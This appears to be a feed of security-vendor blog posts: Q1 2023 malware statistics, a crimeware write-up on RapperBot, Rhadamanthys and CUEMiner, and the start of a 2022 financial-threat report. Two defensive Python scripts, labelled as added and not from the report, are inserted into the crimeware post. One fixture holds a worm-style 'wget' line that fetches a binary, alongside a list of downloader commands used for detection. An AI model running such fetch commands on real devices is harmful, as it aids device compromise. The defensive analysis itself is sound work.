In Q1, we detected attacks using miners on the computers of 403,211 unique users of Kaspersky products worldwide.

Number of unique users attacked by miners, Q1 2023 (download)

Geography of miner attacks

TOP 10 countries/territories attacked by miners

Country/territory* %**
1 Tajikistan 2.87
2 Kazakhstan 2.52
3 Uzbekistan 2.30
4 Kyrgyzstan 2.18
5 Belarus 1.80
6 Venezuela 1.77
7 Ethiopia 1.73
8 Ukraine 1.73
9 Mozambique 1.63
10 Rwanda 1.50

* Excluded are countries/territories with relatively few users of Kaspersky products (under 50,000).
** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country/territory.

Vulnerable applications used in cyberattacks

Quarterly highlights

Q1 2023 saw a number of Windows vulnerabilities remediated and published. Some of those were the following:

  • CVE-2023-23397: probably the most high-profile vulnerability, which provoked much online debate and discussion. This Outlook vulnerability lets a specially crafted message trigger NTLM authentication from the victim’s host to an attacker-controlled server without any user interaction, leaking the user’s Net-NTLMv2 hash.
  • CVE-2023-21674: a vulnerability in the ALPC subsystem that allows a malicious actor to escalate privileges to SYSTEM level.
  • CVE-2023-21823: a Windows Graphics Component vulnerability that allows running code on the system with the privileges of the user. It can be reproduced both in Windows desktop versions of Microsoft Office and in the mobile (iOS and Android) versions.
  • CVE-2023-23376: a Common Log File System driver vulnerability that allows escalating privileges to SYSTEM level.
  • CVE-2023-21768: a vulnerability in the Ancillary Function Driver for WinSock that allows obtaining SYSTEM privileges.

A Microsoft fix for each of the vulnerabilities is out, and we strongly encourage you to install all the relevant patches.

The main network threats in Q1 2023 were brute-force attacks on MSSQL and RDP services. EternalBlue and EternalRomance remained popular exploits for operating system vulnerabilities. We detected notably large numbers of attacks and scans that targeted log4j-type vulnerabilities (CVE-2021-44228).

Vulnerability statistics

In Q1 2023, Kaspersky products detected more than 300,000 exploitation attempts, most of these using Microsoft Office exploits. Their share was 78.96%, down by just 1 p.p. from the previous quarter. The most-exploited vulnerabilities in that category were the following:

  • CVE-2017-11882 and CVE-2018-0802: Equation Editor vulnerabilities that allow corrupting application memory during formula processing to then run arbitrary code in the system.
  • CVE-2017-0199 that allows using MS Office to load malicious scripts.
  • CVE-2017-8570 that allows loading malicious HTA scripts into the system.

The second most-exploited category were browser vulnerabilities (7.07%), their share growing by 1 p.p. We did not discover any new browser vulnerabilities exploited by malicious actors in the wild. Q2 2023 might bring something new.

Distribution of exploits used by cybercriminals by type of attacked application, Q1 2023 (download)

Android (4.04%) and Java (3.93%) were third and fourth, respectively. Android exploits lost 1 p.p. during the period, whereas the share of Java exploits remained unchanged. The fifth- and sixth-place scores — Adobe Flash (3.49%) and PDF (2.52%) — were very close to the previous quarter’s figures as well.

Attacks on macOS

The first quarter’s high-profile event was the supply-chain attack on the 3CX desktop app, including its macOS version. The attackers trojanized the libffmpeg media processing library bundled with the app so that it downloaded a payload from their servers.

Worth noting is the MacStealer spy program, also discovered in Q1 2023, which stole cookies from the victim’s browser, as well as account details and cryptowallet passwords.

TOP 20 threats for macOS

Verdict %*
1 AdWare.OSX.Pirrit.ac 11.87
2 AdWare.OSX.Amc.e 8.41
3 AdWare.OSX.Pirrit.j 7.98
4 AdWare.OSX.Agent.ai 7.58
5 Monitor.OSX.HistGrabber.b 6.64
6 AdWare.OSX.Bnodlero.ax 6.12
7 AdWare.OSX.Pirrit.ae 5.77
8 AdWare.OSX.Agent.gen 4.98
9 Hoax.OSX.MacBooster.a 4.76
10 Trojan-Downloader.OSX.Agent.h 4.66
11 AdWare.OSX.Pirrit.o 3.63
12 Backdoor.OSX.Twenbc.g 3.52
13 AdWare.OSX.Bnodlero.bg 3.32
14 AdWare.OSX.Pirrit.aa 3.20
15 Backdoor.OSX.Twenbc.h 3.14
16 AdWare.OSX.Pirrit.gen 3.14
17 Downloader.OSX.InstallCore.ak 2.37
18 Trojan-Downloader.OSX.Lador.a 2.03
19 RiskTool.OSX.Spigot.a 1.92
20 Trojan.OSX.Agent.gen 1.88

* Unique users who encountered this malware as a percentage of all users of Kaspersky security products for macOS who were attacked.

Adware remained the most widespread threat to macOS users. In addition to that, we frequently came across all kinds of system “cleaners” and “optimizers”, many of these containing highly annoying ads or classic scams, where users were offered to buy solutions to problems that did not exist.

Geography of threats for macOS

ТОР 10 countries/territories by share of attacked users

Country/territory* %**
1 Italy 1.43
2 Spain 1.39
3 France 1.37
4 Russian Federation 1.29
5 Mexico 1.20
6 Canada 1.18
7 United States 1.16
8 United Kingdom 0.98
9 Australia 0.87
10 Brazil 0.81

* Excluded from the rankings are countries/territories with relatively few users of Kaspersky security solutions for macOS (under 10,000).
** Unique attacked users as a percentage of all users of Kaspersky macOS security products in the country/territory.

Italy (1.43%) and Spain (1.39%) became the leaders by number of attacked users, as France (1.37%), Russia (1.29%) and Canada (1.18%) lost a few percentage points. Overall, the percentage of attacked users in the TOP 10 countries did not change much.

IoT attacks

IoT threat statistics

In Q1 2023, a majority of the devices that attacked Kaspersky honeypots still used the Telnet protocol, but its popularity decreased somewhat from the previous quarter.

Telnet 69.2%
SSH 30.8%

Distribution of attacked services by number of unique IP addresses of attacking devices, Q1 2023

In terms of session numbers, Telnet accounted for the absolute majority.

Telnet 97.8%
SSH 2.2%

Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2023

TOP 10 countries/territories as sources of SSH attacks

Country/territory %* (Q4 2022) %* (Q1 2023)
Taiwan 1.60 12.13
United States 19.11 12.05
South Korea 3.32 7.64
Mainland China 8.45 6.80
Brazil 5.10 5.08
India 6.26 4.45
Germany 6.20 4.00
Vietnam 2.18 3.95
Singapore 6.63 3.63
Russian Federation 3.33 3.36
Other 37.81 36.91

* Unique IP addresses located in a country/territory as a percentage of all unique IP addresses where SSH attacks on Kaspersky honeypots originated.

The APAC countries/territories and the U.S. remained the main sources of SSH attacks in Q1 2023.

TOP 10 countries/territories as sources of Telnet attacks

Country/territory %* (Q4 2022) %* (Q1 2023)
Mainland China 46.90 39.92
India 6.61 12.06
Taiwan 6.37 7.51
Brazil 3.31 4.92
Russian Federation 4.53 4.82
United States 4.33 4.30
South Korea 7.39 2.59
Iran 1.05 1.50
Pakistan 1.40 1.41
Kenya 0.06 1.39
Other 18.04 19.58

* Unique IP addresses located in a country/territory as a percentage of all unique IP addresses where Telnet attacks on Kaspersky honeypots originated.

Mainland China (39.92%) remained the largest source of Telnet attacks, with India’s (12.06%) and Kenya’s (1.39%) contributions increasing significantly. The share of attacks that originated in South Korea (2.59%) decreased.

TOP 10 threats delivered to IoT devices via Telnet

Verdict %*
1 Trojan-Downloader.Linux.NyaDrop.b 41.39%
2 Backdoor.Linux.Mirai.b 18.82%
3 Backdoor.Linux.Mirai.cw 9.63%
4 Backdoor.Linux.Mirai.ba 6.18%
5 Backdoor.Linux.Gafgyt.a 2.64%
6 Backdoor.Linux.Mirai.fg 2.25%
7 Backdoor.Linux.Mirai.ew 1.89%
8 Trojan-Downloader.Shell.Agent.p 1.77%
9 Backdoor.Linux.Gafgyt.bj 1.24%
10 Trojan-Downloader.Linux.Mirai.d 1.23%

* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats.

Attacks via web resources

The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious or infected web pages. Some of these sites are created by cybercriminals for this very purpose; hacked legitimate resources and web resources with user-generated content, such as forums, can also be infected.

Countries/territories that serve as sources of web-based attacks: TOP 10

The following statistics show the distribution by country/territory of the sources of internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted.

In Q1 2023, Kaspersky solutions blocked 865,071,227 attacks launched from online resources across the globe. A total of 246,912,694 unique URLs were detected as malicious by Web Anti-Virus.

Distribution of web-attack sources across countries, Q1 2023 (download)

Countries/territories where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in various countries/territories, we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered at least once during the quarter in each country/territory. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in various countries.

Note that these rankings only include attacks by malicious objects that fall under the Malware class; they do not include Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.

Country/territory* %**
1 Turkey 16.88
2 Taiwan 16.01
3 Algeria 15.95
4 Palestine 15.30
5 Albania 14.95
6 Yemen 14.94
7 Serbia 14.54
8 Tunisia 14.13
9 South Korea 13.98
10 Libya 13.93
11 Sri Lanka 13.85
12 Greece 13.53
13 Syria 13.51
14 Nepal 13.10
15 Bangladesh 12.92
16 Georgia 12.85
17 Morocco 12.80
18 Moldova 12.73
19 Lithuania 12.61
20 Bahrain 12.39

* Excluded are countries/territories with relatively few Kaspersky users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky products in the country/territory.

On average during the quarter, 9.73% of internet users’ computers worldwide were subjected to at least one Malware-class web attack.

Local threats

In this section, we analyze statistical data obtained from the OAS and ODS modules of Kaspersky products. It takes into account malicious programs that were found directly on users’ computers or on removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially reached the computer in a form that could not be scanned directly (for example, programs inside complex installers, encrypted files, etc.).

In Q1 2023, our File Anti-Virus detected 43,827,839 malicious and potentially unwanted objects.

Countries and territories where users faced the highest risk of local infection

For each country/territory, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries/territories.

These rankings only include attacks by malicious programs that fall under the Malware class; they do not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

Country/territory* %**
1 Yemen 45.38
2 Turkmenistan 44.68
3 Afghanistan 43.64
4 Tajikistan 42.57
5 Cuba 36.01
6 Burundi 35.20
7 Syria 35.17
8 Bangladesh 35.07
9 Myanmar 34.98
10 Uzbekistan 34.22
11 South Sudan 34.06
12 Rwanda 34.01
13 Algeria 33.94
14 Guinea 33.74
15 Cameroon 33.09
16 Sudan 33.06
17 Chad 33.06
18 Tanzania 32.50
19 Benin 32.42
20 Malawi 31.93

* Excluded are countries/territories with relatively few Kaspersky users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country/territory.

On average worldwide, Malware-class local threats were registered on 15.22% of users’ computers at least once during Q1 2023.

]]>
https://securelist.com/it-threat-evolution-q1-2023-pc-statistics/109917/feed/ 0 full large medium thumbnail
Uncommon infection methods—part 2
https://securelist.com/crimeware-report-uncommon-infection-methods-2/109522/
Thu, 13 Apr 2023 08:00:32 +0000

Introduction

Although ransomware is still a hot topic on which we will keep on publishing, we also investigate and publish about other threats. Recently we explored the topic of infection methods, including malvertising and malicious downloads. In this blog post, we provide excerpts from the recent reports that focus on uncommon infection methods and describe the associated malware.

For questions or more information on our crimeware reporting service, please contact crimewareintel@kaspersky.com.

RapperBot: “intelligent brute forcing”

RapperBot, based on Mirai (but with a different C2 command protocol), is a worm infecting IoT devices with the ultimate goal of launching DDoS attacks against non-HTTP targets. We observed the first sample in June 2022, when it was targeting SSH rather than Telnet services. The latest version, however, removed the SSH functionality and now focuses exclusively on Telnet—and with quite some success. In Q4 2022, we noticed 112k RapperBot infection attempts coming from over 2k unique IP addresses.

What sets RapperBot apart from other worms is its “intelligent” way of brute forcing: it checks the prompt and, based on the prompt, it selects the appropriate credentials. This method speeds up the brute forcing process significantly because it doesn’t have to go over a huge list of credentials.

RapperBot then determines the processor architecture and infects the device. The downloading of the actual malware is done via a variety of possible commands (for example, wget, curl, tftp and ftpget). If for some reason these methods don’t work, then a malware downloader is uploaded to the device via the shell “echo” commands.
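Seen from the defender's side, the behaviour described above leaves a recognisable trace in Telnet honeypot or device logs: a burst of failed logins from one source across several usernames, then a successful login, then a payload-fetch command (wget, curl, tftp, ftpget or echo). The script below is an added example, not code from the report or from RapperBot. It parses log lines in a hypothetical format ("<ISO timestamp> <source IP> <event> <detail>", with event being login-fail, login-ok or cmd), flags sources that exceed a failure burst threshold, and flags the login-then-download sequence. The sample lines, IP addresses and URL are constructed.

```python
"""Telnet brute-force triage over honeypot log lines.

Added example (not code from the report or from RapperBot). The log format is
hypothetical: "<ISO timestamp> <source IP> <event> <detail>", where event is
login-fail, login-ok or cmd. IP addresses and the URL are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Commands the report names as the payload-fetch step after a successful login.
DOWNLOADER_CMDS = ("wget", "curl", "tftp", "ftpget", "echo")

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) "
    r"(?P<event>login-fail|login-ok|cmd) ?(?P<rest>.*)$"
)

# Constructed sample: one source bursts through five credentials, logs in and
# fetches a binary; another fails once and later succeeds without downloading.
SAMPLE_LOG = """\
2022-11-03T10:00:01 198.51.100.7 login-fail root
2022-11-03T10:00:02 198.51.100.7 login-fail admin
2022-11-03T10:00:02 198.51.100.7 login-fail support
2022-11-03T10:00:03 198.51.100.7 login-fail user
2022-11-03T10:00:04 198.51.100.7 login-fail default
2022-11-03T10:00:05 198.51.100.7 login-ok root
2022-11-03T10:00:06 198.51.100.7 cmd wget http://example.invalid/bins/x86 -O /tmp/.x
2022-11-03T10:01:00 203.0.113.9 login-fail admin
2022-11-03T10:30:00 203.0.113.9 login-ok admin
this line is malformed and is skipped
"""


def parse_line(line):
    """Return a dict for a well-formed line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    try:
        ts = datetime.fromisoformat(m["ts"])
    except ValueError:
        return None
    return {"ts": ts, "ip": m["ip"], "event": m["event"], "rest": m["rest"].strip()}


def max_in_window(times, window):
    """Largest number of timestamps that fall inside any interval of `window`."""
    times = sorted(times)
    best, j = 0, 0
    for i, t in enumerate(times):
        while t - times[j] > window:
            j += 1
        best = max(best, i - j + 1)
    return best


def triage(lines, fail_threshold=5, window=timedelta(minutes=5)):
    """Map source IP -> list of reasons it looks like a Telnet worm."""
    per_ip = defaultdict(lambda: {"fails": [], "users": set(),
                                  "success": False, "downloads": []})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        state = per_ip[rec["ip"]]
        if rec["event"] == "login-fail":
            state["fails"].append(rec["ts"])
            state["users"].add(rec["rest"])
        elif rec["event"] == "login-ok":
            state["success"] = True
        else:  # cmd: only the first word matters for the downloader check
            argv = rec["rest"].split()
            if argv and argv[0] in DOWNLOADER_CMDS:
                state["downloads"].append(rec["rest"])

    findings = {}
    for ip, state in per_ip.items():
        reasons = []
        burst = max_in_window(state["fails"], window)
        if burst >= fail_threshold:
            reasons.append(f"{burst} failed logins within {window} "
                           f"across {len(state['users'])} usernames")
        if state["success"] and state["downloads"]:
            reasons.append("successful login followed by download command: "
                           + state["downloads"][0])
        if reasons:
            findings[ip] = reasons
    return findings


if __name__ == "__main__":
    for ip, reasons in triage(SAMPLE_LOG.splitlines()).items():
        print(ip)
        for reason in reasons:
            print("  -", reason)
```

The burst threshold is deliberately low because the prompt-aware credential selection the report describes means a real infection attempt needs far fewer guesses than a classic dictionary run; tune `fail_threshold` and `window` to the device population you monitor. The second signal (login success immediately followed by a downloader command) is the higher-confidence one and is worth alerting on even when the burst count is below threshold.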

Rhadamanthys: malvertising on websites and in search engines

Rhadamanthys is a new information stealer first presented on a Russian-speaking cyber criminal forum in September 2022 and offered as a MaaS platform. According to the author, the malware:

  • Is written in C/C++, while the C2 is written in Golang.
  • Is able to do a “stealthy” infection.
  • Is able to steal/gather information on CPU type, screen resolution, supported wallets, and so on.
  • Evades EDR/AV.
  • Has encrypted communication with the C2.

Despite the malware being advertised already in September 2022, we started to detect the first samples at the beginning of 2023. Although Rhadamanthys was using phishing and spam initially as the infection vector, the most recent method is malvertising.

Online advertising platforms offer advertisers the possibility to bid in order to display brief ads in search engines, such as Google, but also websites, mobile apps and more. Both search engine and website-based ad platforms are leveraged by Rhadamanthys. The trick they pull is to display ads representing legitimate applications but in fact containing links to phishing websites. These phishing websites contain fake installers, luring users into downloading and installing the malware.

While analyzing Rhadamanthys, we noticed a strong connection with Hidden Bee miner. Both samples use images to hide the payload inside and both have similar shellcodes for bootstrapping. Additionally, both use “in-memory virtual file systems” and utilize Lua to load plugins and modules.

Comparison between Rhadamanthys’s “prepare.bin” and Hidden Bee’s “preload” modules

CUEMiner: distribution through BitTorrent and OneDrive

In August 2021, a project called SilentCryptoMiner was started on GitHub, hosting the miner, which consists of a downloader and the payload, the bot source and the compiled builder, as well as additional software such as a system watcher. It has been constantly updated, with the latest update going back to October 31, 2022. The repository is popular with cybercriminals, as illustrated by the huge number of samples we detected that featured many small changes and were combined with different URLs and TTPs, making it clear that the malware is used by multiple groups in various ways concurrently.

During our investigation, we noticed two methods of spreading the malware. The first is via trojanized cracked software downloaded via BitTorrent. The other method is via trojanized cracked software that is downloaded from OneDrive sharing networks. How victims are lured into downloading these cracked packages remains speculation, because we couldn’t find any direct links. Nevertheless, many crack sites these days do not immediately provide downloads. Instead, they point to Discord server channels for further discussion. This suggests some form of human interaction and social engineering.

The downloader is written in .NET and called CUEMiner. Despite being written in .NET, it is wrapped by a C++-based dropper, and it connects to a set of URLs, which varies from sample to sample, to download the miner and configuration settings. It also performs several checks to ensure it is running on a bare-metal system and not on a virtual machine. If all checks pass, the malware:

  • Reconfigures Windows Defender to exclude the user profile path and the entire system drive from scanning.
  • Fetches configuration details from a hardcoded URL and saves them in several locations (for example, c:\logs.uce, %localappdata%\logs.uce).
  • Creates empty files and subdirectories in %ProgramData%\HostData to make the directory look benign.
  • Downloads the miner and watcher.
  • Does a number of other things. The full list you can find in our private report.

The watcher, as the name suggests, monitors the system. If it doesn’t detect any processes that consume lots of system power (for example, games), the miner software is launched. When a heavy process, such as a game, is started, the miner is stopped and only started again when the aforementioned process stops. This is done in order to stay undetected on the system longer.
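The behaviours listed above give a defender concrete things to hunt for: Defender exclusions that cover an entire drive or a whole user profile, the configuration file dropped as logs.uce in the drive root or under %localappdata%, and a populated %ProgramData%\HostData directory. The audit below is an added example, not code from the report or from CUEMiner. It runs over constructed inputs: a list of exclusion paths, as an administrator could export on the host with Get-MpPreference, and a list of file paths from a file-system inventory. The function names, the sample paths and the user name "alice" are my own.

```python
"""Hunting for CUEMiner-style footholds from exported host data.

Added example (not code from the report or from CUEMiner). Inputs are
constructed: a list of Windows Defender exclusion paths, as an administrator
could export on the host with Get-MpPreference, and a list of file paths from
a file-system inventory. The user name "alice" and all paths are made up.
"""
import ntpath

# Constructed input: what an exported exclusion list and a file inventory
# might contain on a host that ran the downloader described in the report.
EXCLUSIONS = [
    "C:\\",                                # whole system drive: suspicious
    "C:\\Users\\alice",                    # whole user profile: suspicious
    "C:\\Program Files\\LegitApp\\cache",  # narrow, plausible exclusion
]
FILES = [
    "C:\\logs.uce",
    "C:\\Users\\alice\\AppData\\Local\\logs.uce",
    "C:\\ProgramData\\HostData\\sub\\empty.txt",
    "C:\\Users\\alice\\Documents\\notes.txt",
]


def norm(path):
    """Normalise a Windows path for comparison (case-insensitive, no ./..)."""
    return ntpath.normpath(path).lower()


def is_drive_root(n):
    """True for a normalised path such as 'c:' or 'c:\\' and nothing deeper."""
    return len(n) in (2, 3) and n[1] == ":" and (len(n) == 2 or n[2] == "\\")


def audit_exclusions(exclusions):
    """Flag exclusions broad enough to blind the scanner to a drive or profile."""
    findings = []
    for raw in exclusions:
        n = norm(raw)
        parts = n.split("\\")
        if is_drive_root(n):
            findings.append((raw, "entire drive excluded from scanning"))
        elif len(parts) in (2, 3) and parts[1] == "users":
            # 'c:\users' (all profiles) or 'c:\users\<name>' (one profile)
            findings.append((raw, "whole user profile excluded from scanning"))
    return findings


def audit_files(paths):
    """Flag the drop locations the report associates with CUEMiner."""
    findings = []
    for raw in paths:
        n = norm(raw)
        head, tail = ntpath.split(n)
        if tail == "logs.uce" and (is_drive_root(head)
                                   or head.endswith("\\appdata\\local")):
            findings.append((raw, "configuration file at a CUEMiner drop location"))
        elif "\\programdata\\hostdata\\" in n + "\\":
            findings.append((raw, "file inside the %ProgramData%\\HostData decoy directory"))
    return findings


def audit(exclusions, paths):
    """Run both checks; hits in both categories together are a strong signal."""
    return {"exclusions": audit_exclusions(exclusions), "files": audit_files(paths)}


if __name__ == "__main__":
    for category, hits in audit(EXCLUSIONS, FILES).items():
        print(category)
        for path, why in hits:
            print(f"  {path}: {why}")
```

A drive-root or profile-wide exclusion is worth investigating on its own, regardless of CUEMiner: few legitimate installers need it, and it silently disables on-access scanning for everything the miner later drops. The file checks are narrow by design (exact file name, exact parent directory), so extend them with the additional paths from the private report if you have access to it.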

Conclusion

Open source malware is often used by less skilled cybercriminals, who often lack the required skills and contacts to conduct massive campaigns. Nevertheless, they can still be quite active and effective, as shown by the huge number of CUEMiner samples we detected. If, over the course of their cybercriminal career, they gain more skills, such as programming and a better understanding of security, they often reuse and improve crucial parts of open source malware’s source code.

Code reuse and rebranding are also used quite often by cybercriminals. There are many ransomware variants that change names over time while mostly containing the same code base. In other cases, cybercriminals re-use parts of the code in new campaigns. For example, the Rhadamanthys stealer features some code overlaps with the Hidden Bee malware. This suggests involvement of at least one individual in the Rhadamanthys campaign who had also been involved in the development of Hidden Bee.

To protect yourself against these threats, intelligence reports can help. If you want to stay up to date on the latest TTPs used by criminals or have questions about our private reports, please contact crimewareintel@kaspersky.com.

Financial cyberthreats in 2022
https://securelist.com/financial-cyberthreats-in-2022/109219/
Wed, 29 Mar 2023 10:00:02 +0000

Financial gain remains the key driver of cybercriminal activity. In the past year, we’ve seen multiple developments in this area – from new attack schemes targeting contactless payments to multiple ransomware groups continuing to emerge and haunt businesses. However, traditional financial threats – such as banking malware and financial phishing, continue to take up a significant share of such financially-motivated cyberattacks.

In 2022, we saw a major upgrade of the notorious Emotet botnet as well as the launch of massive campaigns by Emotet operators throughout the year. For instance, malicious spam campaigns targeting organizations grew 10-fold in April 2022, spreading Qbot and Emotet malware. We also witnessed the emergence of new banking Trojans that hunt for banking credentials, and greater activity on the part of some well-known ones, such as Dtrack, Zbot and Qbot.

The good news is that regardless of these continuous advancements, we’ve witnessed a steady decrease in the number of attacks by banking Trojans. Security solutions integrated into operating systems, two-factor authentication and other verification measures have helped reduce the number of vulnerable users. Additionally, in many markets mobile banking has been pushing out online banking, with more and more convenient and secure banking apps emerging.

Meanwhile, cryptocurrency became a prominent target for those seeking monetary gain. The amount of cryptocurrency-related phishing grew significantly in 2022, and with an endless array of new coins, NFT and other DeFi projects, scammers are continuously duping users. Funds lost via cryptocurrency are hard to track and impossible to return with the help of a regulatory body, as is done with banks and fiat currency, so this trend is likely to continue gaining traction.

Some advanced persistent threat (APT) actors also started tapping into the cryptocurrency market. We previously reported on the Lazarus group, which developed VHD ransomware for the purpose of monetary gain. Now we see that APT actors have also switched to crypto. BlueNoroff developed an elaborate phishing campaign that targeted startups and distributed malware for stealing all crypto in the account tied to the device. They impersonated numerous venture capital groups and investors with considerable success. The NaiveCopy campaign, another example of an advanced threat, targeted stock and cryptocurrency investors in South Korea. And there is more room for further development – hardware wallets and smart contracts could provide a new juicy target for attackers.

This report shines a spotlight on the financial cyberthreat landscape in 2022. It presents a continuation of our previous annual financial threat reports (2018, 2019, 2020, 2021), which provide an overview of the latest trends across the threat landscape. We look at phishing threats commonly encountered by users and companies, as well as the dynamics of various Windows and Android-based financial malware.

Methodology

For this report, we conducted a comprehensive analysis of financial cyber threats in 2022. We focused on malicious software that targets financial services institutions such as online banking, payment systems, e-money services, online stores, and cryptocurrency services. This category of financial malware also includes those seeking unauthorized access to financial organizations’ IT infrastructures.

In addition to financial malware, we also examined phishing activities. This entailed studying the design and distribution of financially themed web pages and emails that impersonate well-known legitimate sites and organizations with the intention of deceiving potential victims into disclosing their private information.

To gain insights into the financial threat landscape, we analyzed data on malicious activities on the devices of Kaspersky security product users. Individuals who use these products voluntarily made their data available to us through Kaspersky Security Network. All data collected from Kaspersky Security Network was anonymized.

We compared the data from 2022 to that of 2021 to identify year-on-year trends in malware development. However, we also included occasional references to earlier years to provide further insights into the evolutionary trends in financial malware.

Key findings

Phishing

  • Financial phishing accounted for 36.3% of all phishing attacks in 2022.
  • E-shop brands were the most popular lure, accounting for 15.56% of attempts to visit phishing sites.
  • PayPal was the almost exclusive focus of phishers in the electronic payment systems category, with 84% of phishing pages targeting the platform.
  • Cryptocurrency phishing saw 40% year-on-year growth in 2022, with 5,040,520 detections compared to 3,596,437 in 2021

PC malware

  • The number of users affected by financial malware continued to decline in 2022, dropping by 14% from 2021.
  • Ramnit and Zbot were the most prevalent malware families, targeting over 50% of affected users.
  • Consumers remained the primary target of financial cyberthreats, accounting for 61.8% of attacks.

Mobile malware

  • The number of Android users attacked with banking malware decreased by around 55% in 2022 compared to the previous year.
  • Bian surpassed Agent as the most active mobile malware family in 2022, with 22% of attacks compared to Agent’s 20%.
  • The geographical distribution of affected users by Android banking malware in 2022 shows that Spain had the highest percentage of targeted users with 1.96%, followed by Saudi Arabia with 1.11% and Australia with 1.09%.

Financial phishing

Phishing continues to be one of the most widespread forms of cybercrime thanks to the low entry threshold and its effectiveness. As we covered previously, cybercriminals can launch phishing campaigns with minimal effort by purchasing ready-made phishing kits.

Phishing is typically built around a classic scheme: first create a website, then craft emails or notifications that mimic real organizations and prompt users to follow a link to the site, share their personal or payment information, or download malware disguised as a legitimate program. Phishers mimic every type of organization, including banks, government services, retail and entertainment, as long as the service has a strong user base.

Financial services in particular are of high interest to phishers due to the direct connection to money and payment data. In 2022, 36.3% of all phishing attacks detected by Kaspersky anti-phishing technologies were related to financial phishing.

Distribution of financial phishing cases by type, 2022

In this report, financial phishing includes banking-specific, but also e-shop and payment systems.

Payment-system phishing refers to phishing pages that mimic well-known payment brands, such as PayPal, MasterCard, Visa, and American Express. E-shops mean online stores and auction sites such as Amazon, Aliexpress, the App Store, and eBay.

In 2022, e-shop brands were the most popular type of lure used by phishers. 15.56% of attempts to visit phishing sites blocked by Kaspersky in 2022 were related to e-shops. If we look at the distribution within financial phishing, e-shops account for 42% of financial phishing cases. E-shops were followed by payment systems (10.39%) and banks (10.39%). Online shopping continues to grow worldwide and, accordingly, the number of brands that are being mimicked by phishers grows with novel schemes appearing on a regular basis.

E-shop brands most frequently exploited in financial phishing schemes, 2022

In 2022, Apple remains the most exploited brand by scammers, with almost 60% of attacks. The allure of winning the latest model of a new device has proved irresistible to many users, especially during the current global crisis with increasing prices. Not only did we see a spike in these types of scams during major Apple events, but also scammers frequently use Apple to lure victims by offering, for instance, newly released iPhones as prizes for predicting match outcomes during major events like the FIFA World Cup. Meanwhile, Amazon remained in second place with 14.81% of attacks.

In the realm of electronic payment systems, PayPal has traditionally been a popular target for exploitation by scammers. However, recent data indicates that this year it is not only the primary but the near exclusive focus of phishers, with a staggering 84.23% of phishing pages for electronic payment systems targeting PayPal. As a result, the shares of other payment systems have plummeted, with MasterCard International down to 3.75%, Visa Inc. down to 3.10%, and American Express down to 2.02% in 2022.

Payment system brands most frequently exploited in financial phishing schemes, 2022

Example of a phishing page mimicking the PayPal login page


Cryptophishing

In 2022, cryptocurrency phishing rose sufficiently to be included as a separate category. While the total number of attempts to visit such sites makes up just a fraction (0.87%) of all phishing, this category of phishing demonstrated 40% year-on-year growth with 5,040,520 detections in 2022 compared to 3,596,437 in 2021. This boom in cryptophishing may be partially explained by the cryptomarket havoc we saw last year. That said, it is so far unclear whether the trend will continue, and this will significantly depend on the trust users put in cryptocurrency.

Example of a phishing page offering crypto


Cryptoscams exploit the topic of cryptocurrency to deceive people and steal their money, often through promises of high returns on investments. Common types include Ponzi schemes, ICO scams, phishing scams, and fake wallet scams.

Example of a phishing page asking for crypto details


Banking malware

This section analyzes banking malware used for stealing login credentials for online banking or payment systems, as well as capturing one-time passwords for two-factor authentication.

Our analysis of financial cyberthreats in 2022 revealed that the number of users affected by financial malware continued to decline. The figures showed a decrease from 405,985 in 2021 to 350,808 in 2022, marking a 14% drop. This decline followed the trend observed over the previous years, with a 35% drop in 2021, a 20% decline in 2020, and a near 13% decrease in 2019. Financial PC malware is on the wane due to the challenges and costs associated with maintaining and developing a botnet capable of successfully attacking users. To execute a successful attack, the Trojan must wait until the user manually logs in to their bank’s website, which has become more infrequent with the growth in popularity of mobile banking apps. Furthermore, the latest versions of operating systems come with built-in security systems, and prolonged presence in the system raises the probability of malware detection. This might also indicate a pivot toward advanced targeted attacks as cybercriminals start to prioritize large business targets.

Additionally, cybercriminals are adapting their tactics to exploit the shift toward mobile banking. As users increasingly switch to phone banking, attackers are developing new techniques to compromise mobile devices and steal sensitive information.

Dynamic change in the number of unique users attacked by banking malware in 2021 – 2022

Main actors among banking malware

Our 2022 analysis of financial cyberthreats revealed the presence of several families of banking malware with varying lifecycles. Ramnit emerged as the most prevalent malware family with a share of 34.4%, followed by Zbot with 16.2%. Interestingly, the analysis highlights that over 50% of affected users were targeted only by these two families. Ramnit activity increased substantially compared to the previous year, when its share was only 3.4%. This malware worm spreads through spam emails with links to infected websites, and steals financial information. Emotet, previously named by Europol the world’s most dangerous malware, made a return to the Top 3 most active malware families after law enforcement shut it down in January 2021.

The lifecycle of Emotet vividly demonstrates how malware families continue to evolve and expand their capabilities to infiltrate and compromise financial systems.

Top 10 PC banking malware families

Name Verdicts %*
Ramnit/Nimnul Trojan-Banker.Win32.Ramnit 34.4
Zbot/Zeus Trojan-Banker.Win32.Zbot 16.2
Emotet Trojan-Banker.Win32.Emotet 6.4
CliptoShuffler Trojan-Banker.Win32.CliptoShuffler 6.2
IcedID Trojan-Banker.Win32.IcedID 4.1
Trickster/Trickbot Trojan-Banker.Win32.Trickster 4.0
SpyEye Trojan-Spy.Win32.SpyEye 3.4
RTM Trojan-Banker.Win32.RTM 2.5
Gozi Trojan-Banker.Win32.Gozi 2.4
